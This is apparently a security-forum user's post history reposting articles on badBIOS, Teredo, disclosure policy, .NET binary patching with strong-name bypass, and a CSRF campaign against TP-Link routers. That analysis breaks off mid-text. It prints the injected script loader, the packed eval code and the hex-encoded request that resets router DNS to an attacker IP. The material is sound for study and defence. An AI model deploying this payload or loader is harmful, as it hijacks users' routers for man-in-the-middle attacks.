Everything posted by Nytro

  1. PHP has to be installed as CGI. And it usually isn't. And when it is, it's on very old servers.
  2. Maybe I'll sound dumb, but what are "Joint Ventures"?
  3. Doesn't look bad at all
  4. Nytro

    ShiftShared

    I'd prefer you send the e-mail addresses by PM if possible. For your own good, I'm saying. Also, maybe don't give out your "personal" e-mail address either. For your own good, I'm saying.
  5. Yes, well done, you're among the few people who still build things... If you have time, even when you find source code for some piece of functionality, try writing it yourself. Even if you understand a source perfectly, it's not enough until you've written it line by line on your own. I'd also suggest trying C# or even C++.
  6. And you're saying you wrote "Remote Desktop" yourself?
  7. Nytro

    Fun stuff

    The interval is far too small; use at least a few milliseconds, not microseconds. It is quite likely that the thread scheduling mechanism takes longer than that (the task switch: saving the registers and switching to another thread). Also, from the usleep(3) Linux man page:

    Errors
        EINTR  Interrupted by a signal; see signal(7).
        EINVAL usec is not smaller than 1000000. (On systems where that is considered an error.)

    4.3BSD, POSIX.1-2001. POSIX.1-2001 declares this function obsolete; use nanosleep(2) instead. POSIX.1-2008 removes the specification of usleep().

    Most likely the system call itself takes longer than the actual sleep. We laugh, we joke, but we're serious too
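The overhead is easy to demonstrate from any language that exposes a sleep call. A minimal Python sketch of the same effect the post describes for usleep() (the measured numbers will vary by machine and scheduler):

```python
import time

def measured_sleep(seconds):
    """Request a sleep and return how long it actually took (wall clock)."""
    t0 = time.perf_counter()
    time.sleep(seconds)
    return time.perf_counter() - t0

# Request 1 microsecond: the syscall entry and the scheduler wakeup cost
# far more than the interval itself, so the real delay is much larger
# than what was asked for.
actual = measured_sleep(1e-6)
print(f"requested 1e-06 s, slept {actual:.6f} s")
```

The sleep is only guaranteed to last at least the requested interval; how much longer it lasts is up to the scheduler, which is exactly why microsecond-scale intervals are meaningless to request.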
  8. Meet “badBIOS,” the mysterious Mac and PC malware that jumps airgaps

    Like a super strain of bacteria, the rootkit plaguing Dragos Ruiu is omnipotent.

    by Dan Goodin - Oct 31 2013

    Three years ago, security consultant Dragos Ruiu was in his lab when he noticed something highly unusual: his MacBook Air, on which he had just installed a fresh copy of OS X, spontaneously updated the firmware that helps it boot. Stranger still, when Ruiu then tried to boot the machine off a CD ROM, it refused. He also found that the machine could delete data and undo configuration changes with no prompting. He didn't know it then, but that odd firmware update would become a high-stakes malware mystery that would consume most of his waking hours.

    In the following months, Ruiu observed more odd phenomena that seemed straight out of a science-fiction thriller. A computer running the OpenBSD operating system also began to modify its settings and delete its data without explanation or prompting. His network transmitted data specific to the Internet's next-generation IPv6 networking protocol, even from computers that were supposed to have IPv6 completely disabled. Strangest of all was the ability of infected machines to transmit small amounts of network data with other infected machines even when their power cords and Ethernet cables were unplugged and their Wi-Fi and Bluetooth cards were removed. Further investigation soon showed that the list of affected operating systems also included multiple variants of Windows and Linux.

    "We were like, 'Okay, we're totally owned,'" Ruiu told Ars. "'We have to erase all our systems and start from scratch,' which we did. It was a very painful exercise. I've been suspicious of stuff around here ever since."

    In the intervening three years, Ruiu said, the infections have persisted, almost like a strain of bacteria that's able to survive extreme antibiotic therapies.
    Within hours or weeks of wiping an infected computer clean, the odd behavior would return. The most visible sign of contamination is a machine's inability to boot off a CD, but other, more subtle behaviors can be observed when using tools such as Process Monitor, which is designed for troubleshooting and forensic investigations. Another intriguing characteristic: in addition to jumping "airgaps" designed to isolate infected or sensitive machines from all other networked computers, the malware seems to have self-healing capabilities.

    "We had an air-gapped computer that just had its [firmware] BIOS reflashed, a fresh disk drive installed, and zero data on it, installed from a Windows system CD," Ruiu said. "At one point, we were editing some of the components and our registry editor got disabled. It was like: wait a minute, how can that happen? How can the machine react and attack the software that we're using to attack it? This is an air-gapped machine and all of the sudden the search function in the registry editor stopped working when we were using it to search for their keys."

    Over the past two weeks, Ruiu has taken to Twitter, Facebook, and Google Plus to document his investigative odyssey and share a theory that has captured the attention of some of the world's foremost security experts. The malware, Ruiu believes, is transmitted through USB drives to infect the lowest levels of computer hardware. With the ability to target a computer's Basic Input/Output System (BIOS), Unified Extensible Firmware Interface (UEFI), and possibly other firmware standards, the malware can attack a wide variety of platforms, escape common forms of detection, and survive most attempts to eradicate it. But the story gets stranger still.
    In posts here, here, and here, Ruiu posited another theory that sounds like something from the screenplay of a post-apocalyptic movie: "badBIOS," as Ruiu dubbed the malware, has the ability to use high-frequency transmissions passed between computer speakers and microphones to bridge airgaps.

    Bigfoot in the age of the advanced persistent threat

    At times as I've reported this story, its outline has struck me as the stuff of urban legend, the advanced persistent threat equivalent of a Bigfoot sighting. Indeed, Ruiu has conceded that while several fellow security experts have assisted his investigation, none has peer reviewed his process or the tentative findings that he's beginning to draw. (A compilation of Ruiu's observations is here.)

    Also unexplained is why Ruiu would be on the receiving end of such an advanced and exotic attack. As a security professional, the organizer of the internationally renowned CanSecWest and PacSec conferences, and the founder of the Pwn2Own hacking competition, he is no doubt an attractive target to state-sponsored spies and financially motivated hackers. But he's no more attractive a target than hundreds or thousands of his peers, who have so far not reported the kind of odd phenomena that has afflicted Ruiu's computers and networks.

    In contrast to the skepticism that's common in the security and hacking cultures, Ruiu's peers have mostly responded with deep-seated concern and even fascination to his dispatches about badBIOS. "Everybody in security needs to follow @dragosr and watch his analysis of #badBIOS," Alex Stamos, one of the more trusted and sober security researchers, wrote in a tweet last week. Jeff Moss—the founder of the Defcon and Blackhat security conferences who in 2009 began advising Department of Homeland Security Secretary Janet Napolitano on matters of computer security—retweeted the statement and added: "No joke it's really serious." Plenty of others agree.
    "Dragos is definitely one of the good reliable guys, and I have never ever even remotely thought him dishonest," security researcher Arrigo Triulzi told Ars. "Nothing of what he describes is science fiction taken individually, but we have not seen it in the wild ever."

    Been there, done that

    Triulzi said he's seen plenty of firmware-targeting malware in the laboratory. A client of his once infected the UEFI-based BIOS of his Mac laptop as part of an experiment. Five years ago, Triulzi himself developed proof-of-concept malware that stealthily infected the network interface controllers that sit on a computer motherboard and provide the Ethernet jack that connects the machine to a network. His research built off of work by John Heasman that demonstrated how to plant hard-to-detect malware known as a rootkit in a computer's peripheral component interconnect, the Intel-developed connection that attaches hardware devices to a CPU.

    It's also possible to use high-frequency sounds broadcast over speakers to send network packets. Early networking standards used the technique, said security expert Rob Graham. Ultrasonic-based networking is also the subject of a great deal of research, including this project by scientists at MIT.

    Of course, it's one thing for researchers in the lab to demonstrate viable firmware-infecting rootkits and ultra high-frequency networking techniques. But as Triulzi suggested, it's another thing entirely to seamlessly fuse the two together and use the weapon in the real world against a seasoned security consultant. What's more, use of a USB stick to infect an array of computer platforms at the BIOS level rivals the payload delivery system found in the state-sponsored Stuxnet worm unleashed to disrupt Iran's nuclear program. And the reported ability of badBIOS to bridge airgaps also has parallels to Flame, another state-sponsored piece of malware that used Bluetooth radio signals to communicate with devices not connected to the Internet.
    "Really, everything Dragos reports is something that's easily within the capabilities of a lot of people," said Graham, who is CEO of penetration testing firm Errata Security. "I could, if I spent a year, write a BIOS that does everything Dragos said badBIOS is doing. To communicate over ultrahigh frequency sound waves between computers is really, really easy."

    Coincidentally, Italian newspapers this week reported that Russian spies attempted to monitor attendees of last month's G20 economic summit by giving them memory sticks and recharging cables programmed to intercept their communications.

    Eureka

    For most of the three years that Ruiu has been wrestling with badBIOS, its infection mechanism remained a mystery. A month or two ago, after buying a new computer, he noticed that it was almost immediately infected as soon as he plugged one of his USB drives into it. He soon theorized that infected computers have the ability to contaminate USB devices and vice versa.

    "The suspicion right now is there's some kind of buffer overflow in the way the BIOS is reading the drive itself, and they're reprogramming the flash controller to overflow the BIOS and then adding a section to the BIOS table," he explained.

    He still doesn't know if a USB stick was the initial infection trigger for his MacBook Air three years ago, or if the USB devices were infected only after they came into contact with his compromised machines, which he said now number between one and two dozen. He said he has been able to identify a variety of USB sticks that infect any computer they are plugged into. At next month's PacSec conference, Ruiu said he plans to get access to expensive USB analysis hardware that he hopes will provide new clues behind the infection mechanism. He said he suspects badBIOS is only the initial module of a multi-staged payload that has the ability to infect the Windows, Mac OS X, BSD, and Linux operating systems.
    "It's going out over the network to get something or it's going out to the USB key that it was infected from," he theorized. "That's also the conjecture of why it's not booting CDs. It's trying to keep its claws, as it were, on the machine. It doesn't want you to boot another OS it might not have code for." To put it another way, he said, badBIOS "is the tip of the warhead, as it were."

    “Things kept getting fixed”

    Ruiu said he arrived at the theory about badBIOS's high-frequency networking capability after observing encrypted data packets being sent to and from an infected laptop that had no obvious network connection with—but was in close proximity to—another badBIOS-infected computer. The packets were transmitted even when the laptop had its Wi-Fi and Bluetooth cards removed. Ruiu also disconnected the machine's power cord so it ran only on battery to rule out the possibility it was receiving signals over the electrical connection. Even then, forensic tools showed the packets continued to flow over the airgapped machine. Then, when Ruiu removed the internal speaker and microphone connected to the airgapped machine, the packets suddenly stopped.

    With the speakers and mic intact, Ruiu said, the isolated computer seemed to be using the high-frequency connection to maintain the integrity of the badBIOS infection as he worked to dismantle software components the malware relied on. "The airgapped machine is acting like it's connected to the Internet," he said. "Most of the problems we were having is we were slightly disabling bits of the components of the system. It would not let us disable some things. Things kept getting fixed automatically as soon as we tried to break them. It was weird."

    It's too early to say with confidence that what Ruiu has been observing is a USB-transmitted rootkit that can burrow into a computer's lowest levels and use it as a jumping off point to infect a variety of operating systems with malware that can't be detected.
    It's even harder to know for sure that infected systems are using high-frequency sounds to communicate with isolated machines. But after almost two weeks of online discussion, no one has been able to rule out these troubling scenarios, either.

    "It looks like the state of the art in intrusion stuff is a lot more advanced than we assumed it was," Ruiu concluded in an interview. "The take-away from this is a lot of our forensic procedures are weak when faced with challenges like this. A lot of companies have to take a lot more care when they use forensic data if they're faced with sophisticated attackers."

    Source: Meet “badBIOS,” the mysterious Mac and PC malware that jumps airgaps | Ars Technica
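As Graham notes above, the acoustic-networking piece of the story is the least exotic part: moving bits over speaker-to-microphone tones is textbook audio frequency-shift keying. A toy Python sketch of the idea (the tone frequencies, symbol length, and sample rate here are arbitrary illustrative choices, not anything taken from badBIOS):

```python
import math

RATE = 44100           # audio sample rate (Hz)
F0, F1 = 18000, 19000  # near-ultrasonic tones for bit 0 and bit 1 (arbitrary)
SYMBOL = 441           # samples per bit (10 ms at 44.1 kHz)

def modulate(bits):
    """Frequency-shift keying: emit one pure tone per bit."""
    samples = []
    for b in bits:
        f = F1 if b else F0
        samples.extend(math.sin(2 * math.pi * f * n / RATE) for n in range(SYMBOL))
    return samples

def goertzel_power(chunk, f):
    """Signal power at frequency f in chunk (Goertzel algorithm)."""
    w = 2 * math.pi * f / RATE
    coeff = 2 * math.cos(w)
    s_prev = s_prev2 = 0.0
    for x in chunk:
        s = x + coeff * s_prev - s_prev2
        s_prev2, s_prev = s_prev, s
    return s_prev2 ** 2 + s_prev ** 2 - coeff * s_prev * s_prev2

def demodulate(samples):
    """Recover bits by comparing the power at the two tone frequencies."""
    bits = []
    for i in range(0, len(samples), SYMBOL):
        chunk = samples[i:i + SYMBOL]
        bits.append(1 if goertzel_power(chunk, F1) > goertzel_power(chunk, F0) else 0)
    return bits
```

A real over-the-air link would need framing, error correction, and filtering on top of this; the sketch only shows that one-tone-per-bit data survives a modulate/demodulate round trip, which is the uncontroversial core of the claim.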
  9. The Teredo Protocol: Tunneling Past Network Security and Other Security Implications

    Dr. James Hoagland
    Principal Security Researcher
    Symantec Advanced Threat Research

    Contents:

    • Introduction
    • Overview: How Teredo works
      • Teredo components
      • Teredo setup
      • Teredo addresses
      • Origin data
      • Qualification procedure
      • Secure qualification
      • Bubble packets and creating a NAT hole
      • Packet relaying and peer setup for non-Teredo peers
        • Finding a relay from IPv6
        • Ping test and finding a relay from IPv4
      • Packet relaying and peer setup for Teredo peers
      • Trusted state
      • Required packet filtering
    • Teredo security considerations
      • Security of NAT types
      • Teredo’s open-ended tunnel (a.k.a. extra security burden on end host)
        • Allowed packets
        • Teredo and IPv6 source routing
        • IPv4 ingress filtering bypass
        • Teredo and bot networks
      • Teredo implications on ability to reach a host through a NAT
      • Information revealed to third parties
      • Teredo anti-spoofing measures
        • Peer address spoofing
        • Server spoofing
      • Denial of Teredo service
        • Storage-based details
        • Relay DOS
        • Server DOS
      • Scanning Teredo addresses compared with native IPv6 addresses
        • Finding a Teredo address for a host
        • Finding any Teredo address for an external IPv4 address
        • Finding any Teredo address on the Internet
        • Scanning difficulties compared
      • The effect of Teredo service on worms
    • Attack pieces
      • Getting Teredo components to send packets to third parties
      • Inducing a client to make external connections
      • Selecting a relay via source routing
      • Finding the IPv4 side of an IPv6 node’s relay
    • Teredo mitigation
    • Conclusion
    • Future work
    • Acknowledgments
    • References

    Download: http://www.symantec.com/avcenter/reference/Teredo_Security.pdf
  10. Disclosure of Vulnerabilities and Exploit Code is an Essential Capability

    Posted by Darren Meyer in RESEARCH, October 30, 2013

    Robert Lemos has an excellent summary of the state of the debate on disclosure of exploit code in his column at Dark Reading. In it, I’m quoted briefly:

        Software vulnerabilities are often discovered independently, suggesting that silencing the disclosure of a vulnerability and how to exploit the flaw would merely allow a bad actor more time to use an attack, says Darren Meyer, senior security researcher at Veracode, an application security firm. “It is really important for the disclosure, or even the release of code, to be a possibility,” he says. “The legal restraint of that would be a very bad practice.”

    But that’s really only part of the story — disclosure is a complicated topic.

    It’s easy to understand the point of view of a defender: details of a specific vulnerability or even example exploit code are scary. Their existence means you as a defender have a very short period of time to react; you have to prioritize that fix instead of rolling it into a planned update, because attackers now have a ready-made path to attack you. These concerns are exactly why Veracode takes such pains to keep the vulnerabilities we discover in our customers’ applications confidential.

    It’s just as easy to understand the point of view of a researcher: their reputations—and thus their livelihoods—depend upon their ability to discover and document vulnerabilities. If they can’t share this information, it becomes very hard for the community and industry to evaluate their abilities objectively. Additionally, the sharing of information about vulnerabilities is essential to advancing the state of the art of defense. We learn from each other, and we apply that knowledge to better defenses.

    Both sets of concerns are valid. It would be detrimental to security if every vulnerability discovered were immediately disclosed along with a working exploit.
    It would be just as bad if researchers were constrained from ever sharing their findings. After all, we’re on the same side—we all want higher-quality software. Fortunately for us, there are various approaches to responsible disclosure, all of which have a few key attributes:

    • The vulnerability is disclosed first to people who have the ability to repair it.
    • The details are kept confidential for a reasonable and agreed-upon period of time to allow the vulnerable party to engineer, properly test, and deploy a fix.
    • Once the vulnerability is fixed (or once a reasonable time to fix has passed), the researcher publishes the details.

    This general framework for responsibly disclosing vulnerabilities strikes an excellent balance among the various concerns of defender, researcher, and user.

    The defender is given an opportunity to benefit from the researcher’s findings. But using this method also allows them to treat the vulnerability like other production defects: it can be appropriately prioritized, the fix can be engineered soundly, and the system can be thoroughly tested before the fix is deployed. Being able to treat a security flaw with the same QA measures as any other production defect results in higher-quality software. At the same time, unaffected defenders are able to learn from the mistakes of others and avoid them in their own systems. This makes everyone safer.

    The researcher retains his or her ability to share important findings with the research and defense communities, advancing the state of the art in research and defense and providing useful opportunities for further academic study. He or she also retains the leverage of disclosure as a way to ensure that the vulnerable party takes the issue seriously—the vulnerability will be disclosed, and so it must be repaired.

    Each user of the system comes out ahead as well. Ideally, they get to see that a vulnerability was discovered and repaired by learning about the vulnerability after the fix is already in place.
    And if not, they can trust that they’ll learn about a vulnerability that affects them should the defender fail in their duty to repair it. On top of that, the user benefits from the better defenses that result from information about vulnerabilities being publicly available.

    Responsible disclosure of vulnerabilities—including the details and even example exploits—simply works for everyone.

    Source: https://www.veracode.com/blog/2013/10/disclosure-of-vulnerabilities-and-exploit-code-is-an-essential-capability/
  11. The DEFCON 21 Social Engineer Capture The Flag Report

    Contents:

    • Executive Summary
    • Overview of the SECTF
      • Background and Description
      • Description of the 2013 Parameters
      • Target Companies
      • Competitors
      • Flags
      • Scoring
      • Rules of Engagement (R.O.E)
    • Results & Analysis
      • Open Source Information Gathering
      • Pretexting
      • Live Call Performance
      • Final Contest Results
      • Discussion
      • Mitigation
        • 1. Corporate Information Handling and Social Media Policies
        • 2. Consistent, Real World Education
        • 3. Regular Risk Assessment and Penetration Test
    • About Social-Engineer, Inc
    • Sponsors

    Download: http://www.social-engineer.org/defcon21/DC21_SECTF_Final.pdf
  12. .NET: Binary Modification Walkthrough

    As I kept promising but failing to do, as I am an unregenerate procrastinator, here is a step-by-step of the binary modification I demonstrated during my Summercon, NordicSec, and Brucon talks.

    I chose Red Gate Reflector for my target app – partly for the “Yo dawg”/Inception jokes, and partly because, as we’ll see later in this blog post, the folks at Red Gate seem to have a bit of a sense of humor about such things. As with most binaries you’ll end up working with, Reflector is obfuscated. The obfuscation used here is SmartAssembly – not surprising, since this is Red Gate’s obfuscation product. This is easily confirmed using the de4dot deobfuscator:

        >de4dot.exe -d "C:\Program Files (x86)\Red Gate\.NET Reflector\Desktop 8.0\Reflector.exe"
        de4dot v2.0.3.3405 Copyright (C) 2011-2013 de4dot@gmail.com
        Latest version and source code: https://bitbucket.org/0xd4d/de4dot

        Detected SmartAssembly 6.6.0.147 (C:\Program Files (x86)\Red Gate\.NET Reflector\Desktop 8.0\Reflector.exe)

    Opening the binary in Reflector in its original state, we can clearly see signs of obfuscation. Symbols have been renamed to garbage characters and methods cannot be displayed. Some, however, have their original names. Well played, Red Gate. I dub this the “RedRoll.”

    Running the app through de4dot improves the readability somewhat and reverts the binary enough that methods can be resolved. However, since the original symbol data has not been stored, the deobfuscator is forced to assign generic names.

    Now that we have a deobfuscated binary, we can start to analyze and modify it. I’ve been relying on two add-ons to make this easier: CodeSearch (as Red Gate’s native search functionality is somewhat lacking) and Reflexil (for assembly modification). For this demonstration, I decided to modify Reflector to add some functionality that I felt was sorely lacking. My goal is to introduce new code into the binary and add a toolbar icon to launch it.
Since we mostly have generic symbols to work with, it’s going to be a bit more of a challenge to identify where existing functionality is implemented as well as where to inject our own code. When analyzing a binary, it helps start with a list of goals, or at the very least touchpoints that you wish to reach. This list will undoubtedly change as you become more familiar with the app; however, it will help provide structure to your analysis. This especially helps if, like me, you tend to jump around haphazardly as new ideas pop in your head. For this particular undertaking, I fleshed out the following steps: Identify where toolbar icons are created and add icon representing the new functionality I’ll add Identify where toolbar icons are linked to the functionality/functions they invoke Insert an assembly reference to a DLL I’ve created into the application Create a new function inside Reflector invoking the functionality implemented in my DLL Link my tool icon to my own function Because symbol renaming was one of the obfuscation techniques performed on this binary, locating the toolbar implementation will require a little digging, but not much. By searching for one of the strings displayed when mousing over a toolbar icon, “Assembly Source Code…,” I was able to determine the toolbar is implemented in Class269.method_26(). Making an educated guess from the code above, the toolbar is created by various calls to Class269.method_29(), passing in the toolBar, the image icon, the mouse over text, keybindings, and a string referring to the function invoked when the icon is clicked. In order to add my own toolbar icon, I’ll need to add another of these calls. This can be done using Reflexil to inject the IL code equivalent, as seen below: The IL written to add the appropriate call is: IL_01ae: ldarg.0 IL_01af: ldarg.1 IL_01b0: call class [System.Drawing]System.Drawing.Image ns36.Class476::get_Nyan() IL_01b5: ldstr "Nyan!" 
IL_01ba: ldc.i4.0
IL_01bb: ldstr "Application.Nyan"
IL_01c0: call instance void ns30.Class269::method_29(class Reflector.ICommandBar, class [System.Drawing]System.Drawing.Image, string, valuetype [System.Windows.Forms]System.Windows.Forms.Keys, string)
IL_01c5: ldarg.1
IL_01c6: callvirt instance class Reflector.ICommandBarItemCollection Reflector.ICommandBar::get_Items()
IL_01cb: callvirt instance class Reflector.ICommandBarSeparator Reflector.ICommandBarItemCollection::AddSeparator()
IL_01d0: pop

PROTIP: If you’re lost on what IL instructions to add, try writing a test app in C# or VB .NET, then use the Disassembly Window in Visual Studio or the IL view in Reflector to see the equivalent IL.

You can see that in this IL, I make a call to ns36.Class476::get_Nyan(). This is a function that I’ll create that returns a System.Drawing.Image object representing the icon to be displayed in the toolbar. I’ll also need to find out where to associate the “Application.Nyan” string with the function that actually calls the functionality I wish to invoke. Doing a bit of digging into the Class476 functions, I end up determining that they are returning the images by slicing off 16×16 portions of CommandBar16.png. This means that I can add my toolbar icon to this image, which lives in the Resources section of the binary, and carve it off as well.

I can then add the get_Nyan() function, modeling it off of the other image-carving functions in Class476:

.method public hidebysig specialname static class [System.Drawing]System.Drawing.Image get_Nyan() cil managed
{
    .maxstack 2
    .locals init (
        [0] class [System.Drawing]System.Drawing.Image image)
    L_0000: ldsfld class [System.Drawing]System.Drawing.Image[] ns36.Class476::image_0
    L_0005: ldc.i4.s 40
    L_0007: ldelem.ref
    L_0008: stloc.0
    L_0009: leave.s L_000b
    L_000b: ldloc.0
    L_000c: ret
}

With that done, I need to find where those pesky strings are linked to actual function calls.
By searching for one of the strings (“Application.OpenFile”), I find it referenced in two functions that look promising – Execute() and QueryStatus(). Looking inside Class269.Execute(), I see that this function creates a dictionary mapping these strings to function calls:

public void Execute(string commandName)
{
    string key = commandName;
    if (key != null)
    {
        int num;
        if (Class722.dictionary_4 == null)
        {
            Dictionary<string, int> dictionary1 = new Dictionary<string, int>(0x10);
            dictionary1.Add("Application.OpenFile", 0);
            dictionary1.Add("Application.OpenCache", 1);
            dictionary1.Add("Application.OpenList", 2);
            dictionary1.Add("Application.CloseFile", 3);
            …
            Class722.dictionary_4 = dictionary1;
        }
        if (Class722.dictionary_4.TryGetValue(key, out num))
        {
            switch (num)
            {
                case 0: this.method_45(); break;
                case 1: this.method_46(); break;
                case 2: this.method_47(); break;
                …
            }
        }
    }
}

QueryStatus() is structured in much the same way. I add my own dictionary entry mapping “Application.Nyan” to the function nyan() with the following IL to add the dictionary key…

IL_00d5: dup
IL_00d6: ldstr "Application.Nyan"
IL_00db: ldc.i4.s 16
IL_00dd: call instance void class [mscorlib]System.Collections.Generic.Dictionary`2<string, int32>::Add(!0, !1)

…and the function mapping:

IL_01c0: ldarg.0
IL_01c1: call instance void ns30.Class269::nyan()
IL_01c6: leave.s IL_01c8

You’ll notice above that I reference a function called nyan(). This is the function I’ll use to implement the functionality the icon click will invoke. I could write this functionality entirely in IL, but I’m actually not much of a masochist. What I decided to do instead was to write a DLL containing the functionality I wanted.
This assembly, derp.dll, was added as an assembly reference. I can then insert IL for the nyan() function into Class269:

.method private hidebysig instance void nyan() cil managed
{
    .maxstack 8
    L_0000: newobj instance void [derp]derp.hurr::.ctor()
    L_0005: callvirt instance void [derp]derp.hurr::showForm()
    L_000a: ret
}

This is about all the modification needed, but now I need to address the Strong Name signing on the binary; otherwise I will not be able to save and execute these changes. There are various tutorials on this subject, but for the purposes of this project I simply enabled Strong Name bypass for this application, as is described here. Reflexil will also allow you to do this upon saving the modified binary.

With the binary saved, I can now launch it. Now, if anything has been done incorrectly, your application will crash with a .NET runtime error either when you launch it or when trying to invoke the new functionality. For this reason, I saved my work and checked that it executed properly periodically throughout the process above. Below shows my new toolbar icon and the result of clicking it.

I feel that Nyan mode greatly enhances the Reflector user experience and hope that Red Gate will consider adding it to a future release.

Sursa: .NET: Binary Modification Walkthrough | I am not interesting enough to have a blog.
13. Real-World CSRF attack hijacks DNS Server configuration of TP-Link routers

Introduction
Analysis of the exploit
Analysis of the CSRF payload
Consequences of a malicious DNS server
Prevalence of the exploit
Recommendations to mitigate the problem
Affected Devices
References

Introduction

Today the majority of wired Internet connections are used with an embedded NAT router, which allows using the same Internet connection with several devices in parallel and also provides some protection against incoming attacks from the Internet. Most of these routers can be configured via a web interface. Unfortunately, many of these web interfaces suffer from common web application vulnerabilities such as CSRF, XSS, insecure authentication and session management, or command injection. In the past years countless vulnerabilities have been discovered and publicly reported. Many of them have remained unpatched by vendors, and even if a patch is available, it is typically only installed on a small fraction of the affected devices. Despite these widespread vulnerabilities, there have been very few public reports of real-world attacks against routers so far.

This article exposes an active exploitation campaign against a known CSRF vulnerability (CVE-2013-2645) in various TP-Link routers. When a user visits a compromised website, the exploit tries to change the upstream DNS server of the router to an attacker-controlled IP address, which can then be used to carry out man-in-the-middle attacks.

Analysis of the exploit

This section describes one occurrence of the exploit. I have seen five different instances of the exploit on unrelated websites so far, and the details of the obfuscation differ between them. However, the actual requests generated by the exploits are the same except for the DNS server IP addresses. As you would expect for malicious content added to a website, the exploit is hidden in obfuscated javascript code.
The first step is a line of javascript appended to a legitimate javascript file used by the website: document.write("<script type=\"text/javascript\" src=\"http://www.[REDACTED].com/js/ma.js\">"); It is possible that the cybercrooks append this line to various javascript files on compromised web servers in an automated way. This code just dynamically adds a new script tag to the website in order to load further javascript code from an external server. The referenced file “ma.js” contains the following encoded javascript code: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('T w$=["\\E\\6\\5\\m\\o\\3\\q\\5\\m\\8\\3\\7\\"\\5\\3\\G\\5\\j\\r\\6\\6\\"\\y\\B\\d\\e\\8\\v\\4\\5\\q\\u\\4\\o\\H\\n\\5\\5\\8\\A\\j\\j\\a\\i\\e\\d\\f\\A\\a\\i\\e\\d\\f\\B\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\j\\u\\6\\3\\4\\z\\8\\e\\j\\s\\a\\f\\F\\n\\r\\8\\C\\3\\4\\l\\3\\4\\z\\8\\e\\1\\n\\5\\e\\I\\i\\n\\r\\8\\6\\3\\4\\l\\3\\4\\7\\2\\c\\d\\8\\2\\7\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\b\\b\\c\\d\\8\\h\\7\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\k\\k\\c\\s\\3\\a\\6\\3\\7\\2\\h\\b\\c\\Q\\a\\5\\3\\x\\a\\m\\7\\b\\1\\b\\1\\b\\1\\b\\c\\i\\v\\e\\a\\d\\f\\7\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\7\\2\\b\\g\\1\\2\\9\\P\\1\\D\\g\\1\\9\\R\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\h\\7\\9\\1\\9\\1\\9\\1\\9\\c\\C\\a\\l\\3\\7\\p\\t\\2\\p\\S\\D\\O\\p\\t\\K\\p\\J\\g\\L\\N\\E\\j\\6\\5\\m\\o\\3\\y\\q"];M["\\x\\4\\d\\5\\3\\o\\f"](w$[0]);',56,56,'|x2e|x31|x65|x72|x74|x73|x3d|x70|x38|x61|x30|x26|x69|x6d|x6e|x36|x32|x64|x2f|x39|x76|x79|x68|x6c|x25|x20|x63|x4c|x42|x75|x6f|_|x77|x3e|x52|x3a|x40|x53|x33|x3c|x44|x78|x28|x3f|x45|x34|x29|document|x3b|x2b|x37|x67|x35|x41|var'.split('|'),0,{})) At first this code looks quite complicated and you probably don’t want to manually analyze 
and decode it. However, it is clearly visible that the file just contains one big eval call. The parameter to eval (the code which is executed) is dynamically computed by an anonymous function based on the parameters p,a,c,k,e,d. A little bit of googling for “eval(function(p,a,c,k,e,d)” shows that this is the result of a publicly available javascript obfuscator. There are several online javascript deobfuscators you can use to reverse engineer the packed javascript. Alternatively, you can also just replace “eval” with “console.log” and then paste the code to the javascript console of Chrome Developer Tools. This just prints out the decoded javascript, which would otherwise be passed to eval. The result of the decoding is the following code: var _$ = ["\x3c\x73\x74\x79\x6c\x65\x20\x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\x2f\x63\x73\x73\"\x3e\x40\x69\x6d\x70\x6f\x72\x74\x20\x75\x72\x6c\x28\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x6d\x69\x6e\x3a\x61\x64\x6d\x69\x6e\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x2f\x75\x73\x65\x72\x52\x70\x6d\x2f\x4c\x61\x6e\x44\x68\x63\x70\x53\x65\x72\x76\x65\x72\x52\x70\x6d\x2e\x68\x74\x6d\x3f\x64\x68\x63\x70\x73\x65\x72\x76\x65\x72\x3d\x31\x26\x69\x70\x31\x3d\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x30\x26\x69\x70\x32\x3d\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x39\x39\x26\x4c\x65\x61\x73\x65\x3d\x31\x32\x30\x26\x67\x61\x74\x65\x77\x61\x79\x3d\x30\x2e\x30\x2e\x30\x2e\x30\x26\x64\x6f\x6d\x61\x69\x6e\x3d\x26\x64\x6e\x73\x73\x65\x72\x76\x65\x72\x3d\x31\x30\x36\x2e\x31\x38\x37\x2e\x33\x36\x2e\x38\x35\x26\x64\x6e\x73\x73\x65\x72\x76\x65\x72\x32\x3d\x38\x2e\x38\x2e\x38\x2e\x38\x26\x53\x61\x76\x65\x3d\x25\x42\x31\x25\x41\x33\x2b\x25\x42\x34\x25\x45\x36\x29\x3b\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x20"]; document["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]); Although this code is still obfuscated, it can easily be understood by decoding the hex-encoded strings. 
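That decoding step is mechanical and easy to script. As a side note (illustrative Python, not part of the original analysis), JavaScript's "\xNN" escapes carry the same meaning in Python's string-escape decoding, so a one-liner recovers the hidden identifiers:

```python
import codecs

def decode_js_hex_string(s):
    # JavaScript "\xNN" escapes have the same meaning in Python's
    # unicode_escape codec, so it decodes them directly.
    return codecs.decode(s, "unicode_escape")

# The obfuscated method name from the exploit:
method = decode_js_hex_string(r"\x77\x72\x69\x74\x65\x6c\x6e")
# method == "writeln", i.e. the call is document.writeln(...)
```

The same function applied to the long `_$[0]` array element yields the full CSRF payload shown below.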
The string “\x77\x72\x69\x74\x65\x6c\x6e” is the hex-encoded version of “writeln”, and given the way object-oriented programming in javascript works, the line ‘document["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]);’ is just a fancy way of writing ‘document.writeln(_$[0]);’. The array element _$[0] contains the stuff which is written to the document, and after decoding the escaped hex characters you get the following equivalent code:

